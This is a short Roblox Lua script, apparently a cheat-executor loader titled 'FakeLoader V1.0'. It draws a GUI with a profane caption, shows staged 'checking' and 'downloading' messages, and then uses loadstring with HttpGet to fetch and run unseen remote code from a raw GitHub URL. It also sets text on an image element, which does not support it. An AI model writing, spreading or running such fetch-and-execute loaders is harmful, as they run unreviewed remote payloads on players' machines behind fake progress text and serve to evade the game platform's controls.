local LDR = Instance.new("ScreenGui")
local NOWAY = Instance.new("ImageLabel")
local Exit = Instance.new("ImageButton")
local HAHA = Instance.new("TextLabel")
local TextLabel = Instance.new("TextLabel")

-- Properties:

LDR.Name = "LDR"
LDR.Parent = game.CoreGui

NOWAY.Name = "NO WAY !"
NOWAY.Parent = LDR
NOWAY.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
NOWAY.BorderColor3 = Color3.fromRGB(0, 0, 0)
NOWAY.BorderSizePixel = 0
NOWAY.Position = UDim2.new(0.337931037, 0, 0.408641964, 0)
NOWAY.Size = UDim2.new(0, 376, 0, 148)
NOWAY.Image = "rbxassetid://14489041755"
NOWAY.Active = true
NOWAY.Draggable = true

Exit.Name = "Exit"
Exit.Parent = NOWAY
Exit.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Exit.BorderColor3 = Color3.fromRGB(0, 0, 0)
Exit.BorderSizePixel = 0
Exit.Position = UDim2.new(0.364380032, 0, 0.672157109, 0)
Exit.Size = UDim2.new(0, 100, 0, 30)
Exit.Image = "rbxassetid://14489068722"

HAHA.Name = "HAHA"
HAHA.Parent = NOWAY
HAHA.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
HAHA.BackgroundTransparency = 1.000
HAHA.BorderColor3 = Color3.fromRGB(0, 0, 0)
HAHA.BorderSizePixel = 0
HAHA.Position = UDim2.new(0.244680852, 0, 0.23648648, 0)
HAHA.Size = UDim2.new(0, 191, 0, 45)
HAHA.Font = Enum.Font.SourceSans
HAHA.Text = "roblox ıs fkn shıt !"
HAHA.TextColor3 = Color3.fromRGB(255, 255, 255)
HAHA.TextSize = 14.000

TextLabel.Parent = NOWAY
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.829787254, 0, 0.817567587, 0)
TextLabel.Size = UDim2.new(0, 113, 0, 27)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "FakeLoader V1.0"
TextLabel.TextColor3 = Color3.fromRGB(157, 255, 28)
TextLabel.TextSize = 9.000
TextLabel.TextXAlignment = Enum.TextXAlignment.Left

-- Scripts:

local function PWPPC_fake_script() -- Exit.LocalScript 
	local script = Instance.new('LocalScript', Exit)

	script.Parent.MouseButton1Click:Connect(function()
		game.CoreGui.LDR:Destroy()
	end)
end
coroutine.wrap(PWPPC_fake_script)()
local function FAFRNQ_fake_script() -- NOWAY.LocalScript 
	local script = Instance.new('LocalScript', NOWAY)

	script.Parent.Text = "Welcome, checking ..."
	wait(4.3)
	script.Parent.Text = "Checked, downloading ..."
		wait(3.0)
	loadstring(game:HttpGet("https://raw.githubusercontent.com/ua835818/aaa/main/realmain.live", true))()
		game.CoreGui.LDR:Destroy()
end
coroutine.wrap(FAFRNQ_fake_script)()
